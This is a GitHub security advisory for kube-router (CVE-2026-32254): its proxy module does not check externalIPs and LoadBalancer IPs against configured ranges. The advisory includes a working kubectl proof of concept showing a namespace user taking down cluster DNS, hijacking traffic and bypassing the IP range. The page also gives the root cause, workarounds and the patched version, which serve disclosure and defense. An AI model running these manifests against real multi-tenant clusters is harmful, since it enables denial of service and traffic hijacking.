GHSA-PHQM-JGC3-QF8G
Vulnerability from github – Published: 2026-03-17 17:12 – Updated: 2026-03-19 21:00kube-router Proxy Module Does Not Validate ExternalIPs or LoadBalancer IPs Against Configured Ranges
Summary
This issue primarily affects multi-tenant clusters where untrusted users are granted namespace-scoped permissions to create or modify Services. Single-tenant clusters or clusters where all Service creators are trusted are not meaningfully affected.
The kube-router proxy module's buildServicesInfo() function directly copies IPs from Service.spec.externalIPs and status.loadBalancer.ingress into node-level network configuration (kube-dummy-if interface, IPVS virtual services, LOCAL routing table) without validating them against the --service-external-ip-range parameter. A user with namespace-scoped Service CRUD permissions can bind arbitrary VIPs on all cluster nodes or cause denial of service to critical cluster services such as kube-dns.
The --service-external-ip-range parameter is only consumed by the netpol (network policy) module for firewall RETURN rules. The proxy module never reads this configuration, creating a gap between administrator expectations and actual enforcement.
Kubernetes' DenyServiceExternalIPs Feature Gate was introduced in v1.22 and remains disabled by default through v1.31, meaning most clusters allow Services to carry externalIPs without any admission control.
Note: This vulnerability class is not unique to kube-router. The upstream Kubernetes project classified the equivalent issue as CVE-2020-8554 (CVSS 5.0/Medium), describing it as a design limitation with no planned in-tree fix. The reference service proxy (kube-proxy) and other third-party service proxy implementations exhibit the same behavior. kube-router's --service-external-ip-range parameter provides more defense-in-depth than most alternatives -- the gap is that this defense did not extend to the proxy module.
Details
Vulnerability Description
Kube-router's proxy module does not validate externalIPs or loadBalancer IPs before programming them into the node's network configuration:
- Unconditional externalIPs copy:
buildServicesInfo()directlycopy()sService.spec.ExternalIPswithout any range validation - Unconditional LoadBalancer IP trust: The same function appends
status.loadBalancer.ingress[].ipwithout verification --service-external-ip-rangenot checked by proxy: This parameter is only referenced in the netpol module, the proxy module never checks it- Cluster-wide impact: IPs are bound to
kube-dummy-ifon all cluster nodes, added to IPVS, and added to thekube-router-svipipset - No conflict detection: ExternalIPs that overlap with existing ClusterIPs (e.g., kube-dns
10.96.0.10) cause the legitimate IPVS real servers to be fully replaced by the attacker's endpoints during the stale-endpoint cleanup cycle, redirecting all traffic for that VIP:port to attacker-controlled pods
Vulnerable Code Locations
File: pkg/controllers/proxy/network_services_controller.go
Lines 866, 898 - Unconditional externalIPs copy:
externalIPs: make([]string, len(svc.Spec.ExternalIPs)),
copy(svcInfo.externalIPs, svc.Spec.ExternalIPs) // No range check
Lines 900-904 - Unconditional LoadBalancer IP trust:
for _, lbIngress := range svc.Status.LoadBalancer.Ingress {
if len(lbIngress.IP) > 0 {
svcInfo.loadBalancerIPs = append(svcInfo.loadBalancerIPs, lbIngress.IP)
}
}
File: pkg/controllers/proxy/utils.go
Lines 425-461 - getAllExternalIPs() merges IPs without range validation:
func getAllExternalIPs(svc *serviceInfo, includeLBIPs bool) map[v1.IPFamily][]net.IP {
// Only performs IP parsing and deduplication, no range checking
}
File: pkg/controllers/proxy/service_endpoints_sync.go
Lines 460-464 - Binds arbitrary IPs to kube-dummy-if via netlink:
err = nsc.ln.ipAddrAdd(dummyVipInterface, externalIP.String(), nodeIP.String(), true)
File: pkg/controllers/netpol/network_policy_controller.go
Lines 960-967 - --service-external-ip-range is ONLY referenced here:
for _, externalIPRange := range config.ExternalIPCIDRs {
_, ipnet, err := net.ParseCIDR(externalIPRange)
npc.serviceExternalIPRanges = append(npc.serviceExternalIPRanges, *ipnet)
}
// The proxy module never references ExternalIPCIDRs
Root Cause
The proxy module was implemented without externalIP range validation. The --service-external-ip-range parameter creates a gap between administrator expectations and actual enforcement: administrators may believe externalIPs are restricted to the configured range, but the proxy module (which actually configures IPVS and network interfaces) does not enforce this restriction.
This is consistent with the broader Kubernetes ecosystem. CVE-2020-8554 documents the same fundamental issue: the Kubernetes API allows Service.spec.externalIPs to be set by any user with Service create/update permissions, and service proxies program these IPs into the data plane without validation. The upstream project's recommended mitigation is API-level admission control (e.g., DenyServiceExternalIPs feature gate, or admission webhooks).
PoC
Environment Setup
# Kind cluster: 1 control-plane + 1 worker
cat > kind-config.yaml <<EOF
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: kube-router-test
networking:
disableDefaultCNI: true
kubeProxyMode: "none"
nodes:
- role: control-plane
- role: worker
EOF
kind create cluster --config kind-config.yaml
kubectl apply -f https://raw.githubusercontent.com/cloudnativelabs/kube-router/v2.7.1/daemonset/kubeadm-kuberouter.yaml
kubectl -n kube-system wait --for=condition=ready pod -l k8s-app=kube-router --timeout=120s
# Create low-privileged attacker
kubectl create namespace attacker-ns
kubectl apply -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
name: cicd-developer
namespace: attacker-ns
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
namespace: attacker-ns
name: service-creator
rules:
- apiGroups: [""]
resources: ["services"]
verbs: ["get", "list", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: service-creator-binding
namespace: attacker-ns
subjects:
- kind: ServiceAccount
name: cicd-developer
namespace: attacker-ns
roleRef:
kind: Role
name: service-creator
apiGroup: rbac.authorization.k8s.io
EOF
Exploitation
Scenario A: Arbitrary VIP Binding
kubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
name: malicious-externalip
namespace: attacker-ns
spec:
selector: { app: non-existent }
ports: [{ port: 80, targetPort: 80 }]
externalIPs: ["192.168.100.50", "10.200.0.1", "172.16.0.99"]
EOF
Result: All 3 IPs appear on kube-dummy-if, IPVS rules, and LOCAL routing table on ALL cluster nodes. No validation, no warning, no audit log.
Scenario B: Cluster DNS Takedown (Single Command)
kubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
name: dns-dos-svc
namespace: attacker-ns
spec:
selector: { app: non-existent-app }
ports:
- { name: dns-udp, port: 53, targetPort: 5353, protocol: UDP }
- { name: dns-tcp, port: 53, targetPort: 5353, protocol: TCP }
externalIPs: ["10.96.0.10"]
EOF
Before attack: kube-dns has 2 healthy real servers (CoreDNS pods).
After attack: The legitimate CoreDNS endpoints are fully evicted from the IPVS virtual service via the activeServiceEndpointMap overwrite and stale-endpoint cleanup cycle. If the attacker's Service has a selector pointing to attacker-controlled pods, those pods become the sole real servers for 10.96.0.10:53 -- receiving 100% of cluster DNS traffic. If no matching pods exist, the virtual service has zero real servers and DNS queries blackhole.
After deleting the attacker's Service: DNS immediately recovers.
Scenario C: --service-external-ip-range Bypass
With --service-external-ip-range=10.200.0.0/16 configured, 192.168.100.50 (outside the range) is still bound. The proxy module never checks this parameter.
Scenario D: Arbitrary VIP Binding With Attacker Backend
A user can bind an arbitrary IP as a VIP on all cluster nodes. For previously unused IPs, this creates a new IPVS virtual service directing traffic to the attacker's pods. For IPs that match an existing ClusterIP on the same port, the attacker's endpoints replace the legitimate endpoints entirely (see Scenario B for the mechanism).
kubectl -n attacker-ns run attacker-backend --image=nginx:alpine --port=80
kubectl -n attacker-ns exec attacker-backend -- sh -c 'echo "HIJACKED-BY-ATTACKER" > /usr/share/nginx/html/index.html'
kubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
name: hijack-svc
namespace: attacker-ns
spec:
selector: { run: attacker-backend }
ports: [{ port: 80, targetPort: 80 }]
externalIPs: ["10.50.0.1"]
EOF
$ curl http://10.50.0.1/
HIJACKED-BY-ATTACKER
Impact
Confidentiality: None - No direct data leakage
Integrity: Low - An attacker can bind arbitrary VIPs on cluster nodes and direct traffic to attacker-controlled pods. When an externalIP matches an existing ClusterIP on the same port, the legitimate endpoints are fully replaced by the attacker's endpoints via the IPVS stale-endpoint cleanup cycle -- the attacker receives 100% of that traffic. However, this is bounded to specific (IP, protocol, port) tuples that the attacker explicitly targets, is immediately visible via kubectl get svc, and constitutes traffic redirection rather than transparent interception. This is consistent with the upstream Kubernetes assessment of CVE-2020-8554 (I:Low).
Availability: High - A single command can take down cluster DNS, affecting all pods' name resolution, service discovery, and control plane communication
Attack Scenarios
- Cluster-wide DNS DoS / traffic co-opt: A user creates one Service with an externalIP matching the kube-dns ClusterIP on port 53. The legitimate CoreDNS endpoints are evicted and the attacker's pods receive all DNS queries cluster-wide.
- Arbitrary VIP binding: A user binds unused IPs as VIPs on all cluster nodes, directing traffic to attacker-controlled pods
- ClusterIP conflict exploitation: A user targets any existing ClusterIP:port combination to replace the legitimate service's endpoints with their own
- Security configuration bypass:
--service-external-ip-rangeis not enforced by the proxy module - Trust boundary violation: Namespace-scoped permissions affect all cluster nodes
Affected Versions
- All kube-router v2.x versions (including latest v2.7.1)
buildServicesInfo()has never referencedExternalIPCIDRs
Patched Versions
v2.8.0 and beyond
Workarounds
- Enable DenyServiceExternalIPs Feature Gate: Add
--feature-gates=DenyServiceExternalIPs=trueto the API server - Deploy admission policy: Use Kyverno/OPA/ValidatingAdmissionPolicy to restrict Services with externalIPs
- Restrict Service creation RBAC: Tighten RBAC to prevent low-privileged users from creating Services
- Monitor Service changes: Enable Kubernetes audit logging for Service create/update operations
- Apply BGP prefix filtering: If kube-router is configured to advertise externalIPs or ClusterIPs via BGP, configure BGP peers (routers, firewalls) to only accept announcements for expected prefix ranges. This prevents a malicious externalIP from being advertised to and routed by the broader network.
Mitigation
Recommended Permanent Fix
- Proxy module should check
--service-external-ip-range: Validate externalIPs against configured ranges inbuildServicesInfo() - Default deny when unconfigured: When
--service-external-ip-rangeis not set, reject all externalIPs - IP conflict detection: Check externalIPs against existing ClusterIPs and NodeIPs
- Audit logging: Log all externalIP configuration changes
Credits
- @b0b0haha (Reporter)
- @j311yl0v3u (Reporter)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/cloudnativelabs/kube-router/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32254"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T17:12:17Z",
"nvd_published_at": "2026-03-18T04:17:24Z",
"severity": "HIGH"
},
"details": "# kube-router Proxy Module Does Not Validate ExternalIPs or LoadBalancer IPs Against Configured Ranges\n\n## Summary\n\nThis issue primarily affects multi-tenant clusters where untrusted users are granted namespace-scoped permissions to create or modify Services. Single-tenant clusters or clusters where all Service creators are trusted are not meaningfully affected.\n\nThe kube-router proxy module\u0027s `buildServicesInfo()` function directly copies IPs from `Service.spec.externalIPs` and `status.loadBalancer.ingress` into node-level network configuration (kube-dummy-if interface, IPVS virtual services, LOCAL routing table) without validating them against the `--service-external-ip-range` parameter. A user with namespace-scoped Service CRUD permissions can bind arbitrary VIPs on all cluster nodes or cause denial of service to critical cluster services such as kube-dns.\n\nThe `--service-external-ip-range` parameter is only consumed by the netpol (network policy) module for firewall RETURN rules. The proxy module never reads this configuration, creating a gap between administrator expectations and actual enforcement.\n\nKubernetes\u0027 `DenyServiceExternalIPs` Feature Gate was introduced in v1.22 and remains disabled by default through v1.31, meaning most clusters allow Services to carry externalIPs without any admission control.\n\n**Note:** This vulnerability class is not unique to kube-router. The upstream Kubernetes project classified the equivalent issue as [CVE-2020-8554](https://github.com/kubernetes/kubernetes/issues/97076) (CVSS 5.0/Medium), describing it as a design limitation with no planned in-tree fix. The reference service proxy (kube-proxy) and other third-party service proxy implementations exhibit the same behavior. kube-router\u0027s `--service-external-ip-range` parameter provides more defense-in-depth than most alternatives -- the gap is that this defense did not extend to the proxy module.\n\n## Details\n\n### Vulnerability Description\n\nKube-router\u0027s proxy module does not validate externalIPs or loadBalancer IPs before programming them into the node\u0027s network configuration:\n\n1. **Unconditional externalIPs copy**: `buildServicesInfo()` directly `copy()`s `Service.spec.ExternalIPs` without any range validation\n2. **Unconditional LoadBalancer IP trust**: The same function appends `status.loadBalancer.ingress[].ip` without verification\n3. **`--service-external-ip-range` not checked by proxy**: This parameter is only referenced in the netpol module, the proxy module never checks it\n4. **Cluster-wide impact**: IPs are bound to `kube-dummy-if` on all cluster nodes, added to IPVS, and added to the `kube-router-svip` ipset\n5. **No conflict detection**: ExternalIPs that overlap with existing ClusterIPs (e.g., kube-dns `10.96.0.10`) cause the legitimate IPVS real servers to be fully replaced by the attacker\u0027s endpoints during the stale-endpoint cleanup cycle, redirecting all traffic for that VIP:port to attacker-controlled pods\n\n### Vulnerable Code Locations\n\n**File**: `pkg/controllers/proxy/network_services_controller.go`\n\n**Lines 866, 898** - Unconditional externalIPs copy:\n```go\nexternalIPs: make([]string, len(svc.Spec.ExternalIPs)),\ncopy(svcInfo.externalIPs, svc.Spec.ExternalIPs) // No range check\n```\n\n**Lines 900-904** - Unconditional LoadBalancer IP trust:\n```go\nfor _, lbIngress := range svc.Status.LoadBalancer.Ingress {\n if len(lbIngress.IP) \u003e 0 {\n svcInfo.loadBalancerIPs = append(svcInfo.loadBalancerIPs, lbIngress.IP)\n }\n}\n```\n\n**File**: `pkg/controllers/proxy/utils.go`\n\n**Lines 425-461** - `getAllExternalIPs()` merges IPs without range validation:\n```go\nfunc getAllExternalIPs(svc *serviceInfo, includeLBIPs bool) map[v1.IPFamily][]net.IP {\n // Only performs IP parsing and deduplication, no range checking\n}\n```\n\n**File**: `pkg/controllers/proxy/service_endpoints_sync.go`\n\n**Lines 460-464** - Binds arbitrary IPs to kube-dummy-if via netlink:\n```go\nerr = nsc.ln.ipAddrAdd(dummyVipInterface, externalIP.String(), nodeIP.String(), true)\n```\n\n**File**: `pkg/controllers/netpol/network_policy_controller.go`\n\n**Lines 960-967** - `--service-external-ip-range` is ONLY referenced here:\n```go\nfor _, externalIPRange := range config.ExternalIPCIDRs {\n _, ipnet, err := net.ParseCIDR(externalIPRange)\n npc.serviceExternalIPRanges = append(npc.serviceExternalIPRanges, *ipnet)\n}\n// The proxy module never references ExternalIPCIDRs\n```\n\n### Root Cause\n\nThe proxy module was implemented without externalIP range validation. The `--service-external-ip-range` parameter creates a gap between administrator expectations and actual enforcement: administrators may believe externalIPs are restricted to the configured range, but the proxy module (which actually configures IPVS and network interfaces) does not enforce this restriction.\n\nThis is consistent with the broader Kubernetes ecosystem. [CVE-2020-8554](https://github.com/kubernetes/kubernetes/issues/97076) documents the same fundamental issue: the Kubernetes API allows `Service.spec.externalIPs` to be set by any user with Service create/update permissions, and service proxies program these IPs into the data plane without validation. The upstream project\u0027s recommended mitigation is API-level admission control (e.g., `DenyServiceExternalIPs` feature gate, or admission webhooks).\n\n## PoC\n\n### Environment Setup\n\n```bash\n# Kind cluster: 1 control-plane + 1 worker\ncat \u003e kind-config.yaml \u003c\u003cEOF\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: kube-router-test\nnetworking:\n disableDefaultCNI: true\n kubeProxyMode: \"none\"\nnodes:\n- role: control-plane\n- role: worker\nEOF\n\nkind create cluster --config kind-config.yaml\nkubectl apply -f https://raw.githubusercontent.com/cloudnativelabs/kube-router/v2.7.1/daemonset/kubeadm-kuberouter.yaml\nkubectl -n kube-system wait --for=condition=ready pod -l k8s-app=kube-router --timeout=120s\n\n# Create low-privileged attacker\nkubectl create namespace attacker-ns\nkubectl apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: cicd-developer\n namespace: attacker-ns\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n namespace: attacker-ns\n name: service-creator\nrules:\n- apiGroups: [\"\"]\n resources: [\"services\"]\n verbs: [\"get\", \"list\", \"create\", \"update\", \"patch\", \"delete\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n name: service-creator-binding\n namespace: attacker-ns\nsubjects:\n- kind: ServiceAccount\n name: cicd-developer\n namespace: attacker-ns\nroleRef:\n kind: Role\n name: service-creator\n apiGroup: rbac.authorization.k8s.io\nEOF\n```\n\n### Exploitation\n\n#### Scenario A: Arbitrary VIP Binding\n\n```bash\nkubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: Service\nmetadata:\n name: malicious-externalip\n namespace: attacker-ns\nspec:\n selector: { app: non-existent }\n ports: [{ port: 80, targetPort: 80 }]\n externalIPs: [\"192.168.100.50\", \"10.200.0.1\", \"172.16.0.99\"]\nEOF\n```\n\nResult: All 3 IPs appear on kube-dummy-if, IPVS rules, and LOCAL routing table on ALL cluster nodes. No validation, no warning, no audit log.\n\n#### Scenario B: Cluster DNS Takedown (Single Command)\n\n```bash\nkubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: Service\nmetadata:\n name: dns-dos-svc\n namespace: attacker-ns\nspec:\n selector: { app: non-existent-app }\n ports:\n - { name: dns-udp, port: 53, targetPort: 5353, protocol: UDP }\n - { name: dns-tcp, port: 53, targetPort: 5353, protocol: TCP }\n externalIPs: [\"10.96.0.10\"]\nEOF\n```\n\nBefore attack: kube-dns has 2 healthy real servers (CoreDNS pods).\nAfter attack: The legitimate CoreDNS endpoints are fully evicted from the IPVS virtual service via the `activeServiceEndpointMap` overwrite and stale-endpoint cleanup cycle. If the attacker\u0027s Service has a selector pointing to attacker-controlled pods, those pods become the sole real servers for `10.96.0.10:53` -- receiving 100% of cluster DNS traffic. If no matching pods exist, the virtual service has zero real servers and DNS queries blackhole.\nAfter deleting the attacker\u0027s Service: DNS immediately recovers.\n\n#### Scenario C: `--service-external-ip-range` Bypass\n\nWith `--service-external-ip-range=10.200.0.0/16` configured, `192.168.100.50` (outside the range) is still bound. The proxy module never checks this parameter.\n\n#### Scenario D: Arbitrary VIP Binding With Attacker Backend\n\nA user can bind an arbitrary IP as a VIP on all cluster nodes. For previously unused IPs, this creates a new IPVS virtual service directing traffic to the attacker\u0027s pods. For IPs that match an existing ClusterIP on the same port, the attacker\u0027s endpoints replace the legitimate endpoints entirely (see Scenario B for the mechanism).\n\n```bash\nkubectl -n attacker-ns run attacker-backend --image=nginx:alpine --port=80\nkubectl -n attacker-ns exec attacker-backend -- sh -c \u0027echo \"HIJACKED-BY-ATTACKER\" \u003e /usr/share/nginx/html/index.html\u0027\nkubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: Service\nmetadata:\n name: hijack-svc\n namespace: attacker-ns\nspec:\n selector: { run: attacker-backend }\n ports: [{ port: 80, targetPort: 80 }]\n externalIPs: [\"10.50.0.1\"]\nEOF\n```\n\n```\n$ curl http://10.50.0.1/\nHIJACKED-BY-ATTACKER\n```\n\n## Impact\n\n**Confidentiality**: None - No direct data leakage\n\n**Integrity**: Low - An attacker can bind arbitrary VIPs on cluster nodes and direct traffic to attacker-controlled pods. When an externalIP matches an existing ClusterIP on the same port, the legitimate endpoints are fully replaced by the attacker\u0027s endpoints via the IPVS stale-endpoint cleanup cycle -- the attacker receives 100% of that traffic. However, this is bounded to specific `(IP, protocol, port)` tuples that the attacker explicitly targets, is immediately visible via `kubectl get svc`, and constitutes traffic redirection rather than transparent interception. This is consistent with the upstream Kubernetes assessment of CVE-2020-8554 (I:Low).\n\n**Availability**: High - A single command can take down cluster DNS, affecting all pods\u0027 name resolution, service discovery, and control plane communication\n\n### Attack Scenarios\n\n1. **Cluster-wide DNS DoS / traffic co-opt**: A user creates one Service with an externalIP matching the kube-dns ClusterIP on port 53. The legitimate CoreDNS endpoints are evicted and the attacker\u0027s pods receive all DNS queries cluster-wide.\n2. **Arbitrary VIP binding**: A user binds unused IPs as VIPs on all cluster nodes, directing traffic to attacker-controlled pods\n3. **ClusterIP conflict exploitation**: A user targets any existing ClusterIP:port combination to replace the legitimate service\u0027s endpoints with their own\n4. **Security configuration bypass**: `--service-external-ip-range` is not enforced by the proxy module\n5. **Trust boundary violation**: Namespace-scoped permissions affect all cluster nodes\n\n## Affected Versions\n\n- All kube-router v2.x versions (including latest v2.7.1)\n- `buildServicesInfo()` has never referenced `ExternalIPCIDRs`\n\n## Patched Versions\n\n[v2.8.0](https://github.com/cloudnativelabs/kube-router/releases/tag/v2.8.0) and beyond\n\n## Workarounds\n\n1. **Enable DenyServiceExternalIPs Feature Gate**: Add `--feature-gates=DenyServiceExternalIPs=true` to the API server\n2. **Deploy admission policy**: Use Kyverno/OPA/ValidatingAdmissionPolicy to restrict Services with externalIPs\n3. **Restrict Service creation RBAC**: Tighten RBAC to prevent low-privileged users from creating Services\n4. **Monitor Service changes**: Enable Kubernetes audit logging for Service create/update operations\n5. **Apply BGP prefix filtering**: If kube-router is configured to advertise externalIPs or ClusterIPs via BGP, configure BGP peers (routers, firewalls) to only accept announcements for expected prefix ranges. This prevents a malicious externalIP from being advertised to and routed by the broader network.\n\n## Mitigation\n\n### Recommended Permanent Fix\n\n1. **Proxy module should check `--service-external-ip-range`**: Validate externalIPs against configured ranges in `buildServicesInfo()`\n2. **Default deny when unconfigured**: When `--service-external-ip-range` is not set, reject all externalIPs\n3. **IP conflict detection**: Check externalIPs against existing ClusterIPs and NodeIPs\n4. **Audit logging**: Log all externalIP configuration changes\n\n## Credits\n\n- @b0b0haha (Reporter)\n- @j311yl0v3u (Reporter)",
"id": "GHSA-phqm-jgc3-qf8g",
"modified": "2026-03-19T21:00:43Z",
"published": "2026-03-17T17:12:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/cloudnativelabs/kube-router/security/advisories/GHSA-phqm-jgc3-qf8g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32254"
},
{
"type": "WEB",
"url": "https://github.com/cloudnativelabs/kube-router/commit/a1f0b2eea3ee0f66b9a5b5c49dcb714619ccd456"
},
{
"type": "PACKAGE",
"url": "https://github.com/cloudnativelabs/kube-router"
},
{
"type": "WEB",
"url": "https://github.com/cloudnativelabs/kube-router/releases/tag/v2.8.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "Kube-router Proxy Module Blindly Trusts ExternalIPs/LoadBalancer IPs Enabling Cluster-Wide Traffic Hijacking and DNS DoS"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.